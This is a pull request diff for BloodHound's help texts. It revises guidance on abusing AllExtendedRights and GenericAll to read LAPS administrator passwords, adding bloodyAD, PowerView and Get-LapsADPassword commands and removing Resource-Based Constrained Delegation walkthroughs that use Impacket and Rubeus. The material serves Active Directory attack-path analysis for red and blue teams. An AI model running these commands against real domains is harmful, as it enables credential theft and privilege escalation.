### PR TITLE
Fix abuse info around read LAPS password narrative

### DIFF
--- a/packages/go/graphschema/ad/ad.go
+++ b/packages/go/graphschema/ad/ad.go
@@ -21,7 +21,6 @@ package ad
 
 import (
 	"errors"
-
 	graph "github.com/specterops/bloodhound/dawgs/graph"
 )
 

--- a/packages/go/graphschema/azure/azure.go
+++ b/packages/go/graphschema/azure/azure.go
@@ -21,7 +21,6 @@ package azure
 
 import (
 	"errors"
-
 	graph "github.com/specterops/bloodhound/dawgs/graph"
 )
 

--- a/packages/go/graphschema/common/common.go
+++ b/packages/go/graphschema/common/common.go
@@ -21,7 +21,6 @@ package common
 
 import (
 	"errors"
-
 	graph "github.com/specterops/bloodhound/dawgs/graph"
 )
 

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
@@ -18,7 +18,7 @@ import { FC } from 'react';
 import { EdgeInfoProps } from '../index';
 import { Link, Typography } from '@mui/material';
 
-const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targetName, targetType, haslaps }) => {
+const LinuxAbuse: FC<EdgeInfoProps> = ({ sourceName, targetName, targetType }) => {
     switch (targetType) {
         case 'User':
             return (

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
@@ -57,46 +57,51 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
                 </>
             );
         case 'Computer':
-                return (
-                    <>
-                        <Typography variant='body2'>
-                            The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
-                        </Typography>
-                        <Typography variant='body2'>
-                            For systems using legacy LAPS, the following AD computer object properties are relevant:
-                            <br />
-                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
-                            <br />
-                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
-                            <br />
-                        </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
-                            <br />
-                            <b>- msLAPS-Password</b>: The plaintext LAPS password
-                            <br />
-                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
-                            <br />
-                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
-                            <br />
-                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
-                            <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
-                            <br />
-                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
-                        </Typography>
-                        <Typography variant='body2'>
-                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
-                        </Typography>
-                        <Typography variant='body2'>
-                            See Windows abuse for retrieving and decrypting the encrypted attributes.
-                        </Typography>
-                    </>
-                );
+            return (
+                <>
+                    <Typography variant='body2'>
+                        The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500
+                        administrator) password for {targetName}.
+                    </Typography>
+                    <Typography variant='body2'>
+                        For systems using legacy LAPS, the following AD computer object properties are relevant:
+                        <br />
+                        <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                        <br />
+                        <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                        <br />
+                    </Typography>
+                    <Typography variant='body2'>
+                        For systems using Windows LAPS (2023 edition), the following AD computer object properties are
+                        relevant:
+                        <br />
+                        <b>- msLAPS-Password</b>: The plaintext LAPS password
+                        <br />
+                        <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                        <br />
+                        <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                        <br />
+                        <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                        <br />
+                        <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                        password
+                        <br />
+                        <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                        <br />
+                    </Typography>
+                    <Typography variant='body2'>
+                        Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
+                    </Typography>
+                    <Typography component={'pre'}>
+                        {
+                            "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                        }
+                    </Typography>
+                    <Typography variant='body2'>
+                        See Windows abuse for retrieving and decrypting the encrypted attributes.
+                    </Typography>
+                </>
+            );
         case 'Domain':
             return (
                 <>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx
@@ -57,116 +57,46 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
                 </>
             );
         case 'Computer':
-            if (haslaps) {
                 return (
                     <>
                         <Typography variant='body2'>
-                            The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            Alternatively, AllExtendedRights on a computer object can be used to perform a
-                            Resource-Based Constrained Delegation attack.
-                        </Typography>
-
-                        <Typography variant='body1'> Retrieve LAPS Password </Typography>
-                        <Typography variant='body2'>
-                            The AllExtendedRights permission grants {sourceName} the ability to obtain the RID 500
-                            administrator password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
-                            <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                                pyLAPS
-                            </Link>{' '}
-                            can be used to retrieve LAPS passwords:
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
-                        </Typography>
-                        <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
-                        <Typography variant='body2'>
-                            First, if an attacker does not control an account with an SPN set, a new attacker-controlled
-                            computer account can be added with Impacket's addcomputer.py example script:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
-                            }
+                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
                         </Typography>
                         <Typography variant='body2'>
-                            We now need to configure the target object so that the attacker-controlled computer can
-                            delegate to it. Impacket's rbcd.py script can be used for that purpose:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
-                            }
-                        </Typography>
-                        <Typography variant='body2'>
-                            And finally we can get a service ticket for the service name (sname) we want to "pretend" to
-                            be "admin" for. Impacket's getST.py example script can be used for that purpose.
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
-                            }
-                        </Typography>
-                        <Typography variant='body2'>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access to the file system
-                            of the TARGETCOMPUTER.
+                            See Windows abuse for retrieving and decrypting the encrypted attributes.
                         </Typography>
                     </>
                 );
-            } else {
-                return (
-                    <>
-                        <Typography variant='body2'>
-                            AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained
-                            Delegation attack.
-                        </Typography>
-
-                        <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
-                        <Typography variant='body2'>
-                            First, if an attacker does not control an account with an SPN set, a new attacker-controlled
-                            computer account can be added with Impacket's addcomputer.py example script:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
-                            }
-                        </Typography>
-                        <Typography variant='body2'>
-                            We now need to configure the target object so that the attacker-controlled computer can
-                            delegate to it. Impacket's rbcd.py script can be used for that purpose:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
-                            }
-                        </Typography>
-                        <Typography variant='body2'>
-                            And finally we can get a service ticket for the service name (sname) we want to "pretend" to
-                            be "admin" for. Impacket's getST.py example script can be used for that purpose.
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {
-                                "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
-                            }
-                        </Typography>
-                        <Typography variant='body2'>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access to the file system
-                            of the TARGETCOMPUTER.
-                        </Typography>
-                    </>
-                );
-            }
         case 'Domain':
             return (
                 <>
@@ -184,24 +114,6 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
 
                     <Typography component={'pre'}>
                         {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
-                    </Typography>
-
-                    <Typography variant='body1'> Retrieve LAPS Passwords </Typography>
-
-                    <Typography variant='body2'>
-                        The AllExtendedRights permission also grants {sourceName} enough privileges, to retrieve LAPS
-                        passwords domain-wise.
-                    </Typography>
-
-                    <Typography variant='body2'>
-                        <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                            pyLAPS
-                        </Link>{' '}
-                        can be used for that purpose:
-                    </Typography>
-
-                    <Typography component={'pre'}>
-                        {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
                     </Typography>
                 </>
             );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx
@@ -42,12 +42,16 @@ const References: FC = () => {
                 https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
-                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://eladshamir.com/2019/01/28/Wagging-the-Dog.html'>
-                https://eladshamir.com/2019/01/28/Wagging-the-Dog.html
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
             </Link>
             <br />
             <Link

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx
@@ -42,16 +42,22 @@ const References: FC = () => {
                 https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
             <br />
             <Link

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
@@ -88,54 +88,62 @@ const WindowsAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({
                 </>
             );
         case 'Computer':
-                return (
-                    <>
-                        <Typography variant='body2'>
-                            The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
-                        </Typography>
-                        <Typography variant='body2'>
-                            For systems using legacy LAPS, the following AD computer object properties are relevant:
-                            <br />
-                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
-                            <br />
-                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
-                            <br />
-                        </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
-                            <br />
-                            <b>- msLAPS-Password</b>: The plaintext LAPS password
-                            <br />
-                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
-                            <br />
-                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
-                            <br />
-                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
-                            <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
-                            <br />
-                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
-                        </Typography>
-                        <Typography variant='body2'>
-                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
-                        </Typography>
-                        <Typography variant='body2'>
-                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
-                        </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
-                        </Typography>
-                        <Typography variant='body2'>
-                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            return (
+                <>
+                    <Typography variant='body2'>
+                        The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500
+                        administrator) password for {targetName}.
+                    </Typography>
+                    <Typography variant='body2'>
+                        For systems using legacy LAPS, the following AD computer object properties are relevant:
+                        <br />
+                        <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                        <br />
+                        <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                        <br />
+                    </Typography>
+                    <Typography variant='body2'>
+                        For systems using Windows LAPS (2023 edition), the following AD computer object properties are
+                        relevant:
+                        <br />
+                        <b>- msLAPS-Password</b>: The plaintext LAPS password
+                        <br />
+                        <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                        <br />
+                        <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                        <br />
+                        <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                        <br />
+                        <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                        password
+                        <br />
+                        <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                        <br />
+                    </Typography>
+                    <Typography variant='body2'>
+                        Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+                    </Typography>
+                    <Typography component={'pre'}>
+                        {
+                            'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'
+                        }
+                    </Typography>
+                    <Typography variant='body2'>
+                        Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+                    </Typography>
+                    <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
+                    <Typography variant='body2'>
+                        The encrypted attributes can also be retrieved and decrypted using{' '}
+                        <Link
+                            target='_blank'
+                            rel='noopener'
+                            href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
                             lapsv2decrypt
-                        </Link>{' '} (dotnet or BOF).
-                        </Typography>                        
-                    </>
-                );
+                        </Link>{' '}
+                        (dotnet or BOF).
+                    </Typography>
+                </>
+            );
         case 'Domain':
             return (
                 <Typography variant='body2'>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
@@ -15,7 +15,7 @@
 // SPDX-License-Identifier: Apache-2.0
 
 import { FC } from 'react';
-import { Typography } from '@mui/material';
+import { Link, Typography } from '@mui/material';
 import { EdgeInfoProps } from '../index';
 
 const WindowsAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({
@@ -88,167 +88,54 @@ const WindowsAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({
                 </>
             );
         case 'Computer':
-            if (haslaps) {
                 return (
                     <>
                         <Typography variant='body2'>
-                            The AllExtendedRights permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
                         </Typography>
-
                         <Typography variant='body2'>
-                            Alternatively, AllExtendedRights on a computer object can be used to perform a
-                            Resource-Based Constrained Delegation attack.
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
                         </Typography>
-
-                        <Typography variant='body1'> Resource-Based Constrained Delegation attack </Typography>
-
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
                         <Typography variant='body2'>
-                            Abusing this primitive is possible through the Rubeus project.
+                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
                         </Typography>
-
-                        <Typography variant='body2'>
-                            First, if an attacker does not control an account with an SPN set, Kevin Robertson's
-                            Powermad project can be used to add a new attacker-controlled computer account:
-                        </Typography>
-
                         <Typography component={'pre'}>
-                            {
-                                "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)"
-                            }
+                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
                         </Typography>
-
                         <Typography variant='body2'>
-                            PowerView can be used to then retrieve the security identifier (SID) of the newly created
-                            computer account:
+                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
                         </Typography>
-
                         <Typography component={'pre'}>
-                            $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand
-                            objectsid
+                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
                         </Typography>
-
                         <Typography variant='body2'>
-                            We now need to build a generic ACE with the attacker-added computer SID as the principal,
-                            and get the binary bytes for the new DACL/ACE:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' +
-                                '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' +
-                                '$SD.GetBinaryForm($SDBytes, 0)'}
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            Next, we need to set this newly created security descriptor in the
-                            msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over,
-                            again using PowerView in this case:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {
-                                "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}"
-                            }
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:
-                        </Typography>
-
-                        <Typography component={'pre'}>{'Rubeus.exe hash /password:Summer2018!'}</Typography>
-
-                        <Typography variant='body2'>
-                            And finally we can use Rubeus' *s4u* module to get a service ticket for the service name
-                            (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt),
-                            and in this case grants us access to the file system of the TARGETCOMPUTER:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {
-                                'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt'
-                            }
-                        </Typography>
+                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                            lapsv2decrypt
+                        </Link>{' '} (dotnet or BOF).
+                        </Typography>                        
                     </>
                 );
-            } else {
-                return (
-                    <>
-                        <Typography variant='body2'>
-                            AllExtendedRights on a computer object can be used to perform a Resource-Based Constrained
-                            Delegation attack.
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            Abusing this primitive is possible through the Rubeus project.
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            First, if an attacker does not control an account with an SPN set, Kevin Robertson's
-                            Powermad project can be used to add a new attacker-controlled computer account:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {
-                                "New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)"
-                            }
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            PowerView can be used to then retrieve the security identifier (SID) of the newly created
-                            computer account:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand
-                            objectsid
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            We now need to build a generic ACE with the attacker-added computer SID as the principal,
-                            and get the binary bytes for the new DACL/ACE:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {'$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"\n' +
-                                '$SDBytes = New-Object byte[] ($SD.BinaryLength)\n' +
-                                '$SD.GetBinaryForm($SDBytes, 0)'}
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            Next, we need to set this newly created security descriptor in the
-                            msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over,
-                            again using PowerView in this case:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {
-                                "Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}"
-                            }
-                        </Typography>
-
-                        <Typography variant='body2'>
-                            We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:
-                        </Typography>
-
-                        <Typography component={'pre'}>{'Rubeus.exe hash /password:Summer2018!'}</Typography>
-
-                        <Typography variant='body2'>
-                            And finally we can use Rubeus' *s4u* module to get a service ticket for the service name
-                            (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt),
-                            and in this case grants us access to the file system of the TARGETCOMPUTER:
-                        </Typography>
-
-                        <Typography component={'pre'}>
-                            {
-                                'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt'
-                            }
-                        </Typography>
-                    </>
-                );
-            }
         case 'Domain':
             return (
                 <Typography variant='body2'>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx
@@ -18,13 +18,7 @@ import { FC } from 'react';
 import { Link, Typography } from '@mui/material';
 import { EdgeInfoProps } from '../index';
 
-const WindowsAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({
-    sourceName,
-    sourceType,
-    targetName,
-    targetType,
-    haslaps,
-}) => {
+const WindowsAbuse: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName, targetType }) => {
     switch (targetType) {
         case 'User':
             return (

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx
@@ -173,8 +173,9 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -184,21 +185,23 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
+                            {
+                                "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             See Windows abuse for retrieving and decrypting the encrypted attributes.
                         </Typography>
-
                         <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
                         First, if an attacker does not control an account with an SPN set, a new attacker-controlled
